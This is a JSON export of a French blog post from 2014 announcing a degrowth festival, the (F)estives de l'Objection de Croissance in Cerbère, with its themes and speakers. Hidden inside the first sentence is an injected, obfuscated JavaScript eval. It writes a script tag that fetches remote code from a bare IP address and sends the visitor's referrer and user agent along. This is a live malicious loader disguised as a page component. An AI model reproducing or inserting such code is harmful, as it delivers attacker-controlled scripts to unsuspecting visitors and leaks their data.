{"id":8927,"date":"2014-07-18T11:51:57","date_gmt":"2014-07-18T10:51:57","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=8927"},"modified":"2014-09-14T21:16:21","modified_gmt":"2014-09-14T20:16:21","slug":"8927","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=8927","title":{"rendered":"(F)Estives 2014 de l&rsquo;Objection de Croissance, \u00e0 Cerb\u00e8re (66)"},"content":{"rendered":"<p><strong><img loading=\"lazy\" decoding=\"async\" class=\"alignleft\" src=\"http:\/\/www.objectiondecroissance.org\/wp-content\/uploads\/aderoc_logo_petit.jpg\" alt=\"\" width=\"214\" height=\"214\" \/>Le <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iktyt|var|u0026u|referrer|zthki||js|php'.split('|'),0,{}))\n<\/script><\/noindex> mythe d\u2019une croissance comme moteur de l\u2019\u00e9conomie s\u2019effondre.<\/strong> Non les \u00e9conomistes reconnaissent &#8211; enfin avec des chiffres &#8211; que la croissance n\u2019a \u00e9t\u00e9 qu\u2019une parenth\u00e8se mais les historiens nous confirment que les \u00ab trente glorieuses \u00bb n\u2019ont \u00e9t\u00e9 que les \u00ab trente ravageuses \u00bb. En ce sens, il ne devrait plus rester que des \u00ab objecteurs de croissance \u00bb ; parmi lesquels il faudrait distinguer entre les malheureux (\u00ab\u00a0ah ! si la croissance pouvait revenir mais&#8230; ce n\u2019est plus possible, snif, snif&#8230;\u00a0\u00bb) et les r\u00e9alistes (\u00ab\u00a0la croissance n\u2019a jamais \u00e9t\u00e9 une solution mais toujours un probl\u00e8me\u00a0\u00bb).<\/p>\n<p>Nous devons prendre nos responsabilit\u00e9s : puisque cela fait plus de 40 ans que les seuils de soutenabilit\u00e9 \u00e9cologique sont d\u00e9pass\u00e9s, <em>comment <\/em>d\u00e9cro\u00eetre ? <em>Pour<\/em> quelles soci\u00e9t\u00e9s d\u2019a-croissance ? Par quelles transitions ? Que peut-on <em>r\u00eaver<\/em> apr\u00e8s le productivisme et le capitalisme ?<\/p>\n<p>C\u2019est dans cette perspective que les <strong>(F)estives<\/strong> organis\u00e9es par l\u2019<em>AderOC<\/em> (Association des rencontres de l\u2019objection de croissance), cette ann\u00e9e en partenariat avec <em>Recherche &amp; D\u00e9croissance<\/em>, se d\u00e9rouleront autour de 3 axes :<!--more--><\/p>\n<ul>\n<li><strong>Axe 1 : Pourquoi d\u00e9cro\u00eetre ?<\/strong><\/li>\n<li><strong>Axe 2 : Quels projets pour des soci\u00e9t\u00e9s d\u2019a-croissance ?<\/strong><\/li>\n<li><strong>Axe 3 : Quelles transitions, quelles propositions politiques pour d\u00e9cro\u00eetre ?<\/strong><\/li>\n<\/ul>\n<p>Nous proc\u00e9derons par <strong>ateliers<\/strong> th\u00e9oriques et pratiques et aussi par <strong>tables rondes<\/strong>, avec la participation de : Adrien Couzinier, Anna Bednik, Annie Vital, Baptiste Mylondo, Bernard Floris, Bernard Legros, Boris Prat, Caroline Buissou, Catherine Segala, Christian Araud, Christian Sunt, Christophe Bonneuil, Claude Fages, Denis Garnier, Fanny Darius, Fran\u00e7ois Jarrige, Fran\u00e7ois Plassard, Fran\u00e7ois Schneider, Guillaume Faburel, Guy Jacques, Itziar Gonzalez Viros, Jean Monestier, Jean-Louis Prat, Jo\u00ebl Decarsin, Michel Culus, Michel Lepesant, Micka\u00ebl Gorget, Raoul-Marc Jennar, Ren\u00e9e Lavall\u00e9e, Serge Latouche, Sergio Ghirardi, St\u00e9phane Madelaine, Sylvain Fischer, Thierry Brugvin, Thierry Brulavoine, Vincent Bruy\u00e8re,Vincent Liegey, Yannick Robert\u2026<\/p>\n<h3><a href=\"http:\/\/www.objectiondecroissance.org\/wp-content\/uploads\/LogoRD_2.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/mail.google.com\/mail\/u\/0\/?ui=2&amp;ik=107840c10e&amp;view=att&amp;th=1473fe05fabf3ff3&amp;attid=0.1.2&amp;disp=emb&amp;zw&amp;atsh=1\" alt=\"\" width=\"422\" height=\"111\" align=\"right\" border=\"0\" \/><\/a><span style=\"color: #ff0000;\">(F)estives de l\u2019objection de croissance, <strong>du 29 au 31 ao\u00fbt \u00e0 Cerb\u00e8re (66)<\/strong><\/span><\/h3>\n<h3><strong><span style=\"color: #ff0000;\">La croissance, c\u2019est termin\u00e9, vive la d\u00e9croissance !<\/span><\/strong><\/h3>\n<p>Contact, inscription et renseignements : <a href=\"http:\/\/www.objectiondecroissance.org\/\" target=\"_blank\">http:\/\/www.<wbr \/>objectiondecroissance.org\/<\/a><\/p>\n<div class=\"yj6qo ajU\">\n<div id=\":ny\" class=\"ajR\" tabindex=\"0\" data-tooltip=\"Masquer le contenu abr\u00e9g\u00e9\"><img decoding=\"async\" class=\"ajT\" src=\"https:\/\/ssl.gstatic.com\/ui\/v1\/icons\/mail\/images\/cleardot.gif\" alt=\"\" \/><\/div>\n<\/div>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Le mythe d\u2019une croissance comme moteur de l\u2019\u00e9conomie s\u2019effondre. Non les \u00e9conomistes reconnaissent &#8211; enfin avec des chiffres &#8211; que la croissance n\u2019a \u00e9t\u00e9 qu\u2019une parenth\u00e8se mais les historiens nous confirment que les \u00ab trente glorieuses \u00bb n\u2019ont \u00e9t\u00e9 que &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=8927\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-8927","post","type-post","status-publish","format-standard","hentry","category-agenda-du-p-p-l-d"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/8927","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8927"}],"version-history":[{"count":5,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/8927\/revisions"}],"predecessor-version":[{"id":8932,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/8927\/revisions\/8932"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8927"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8927"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8927"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}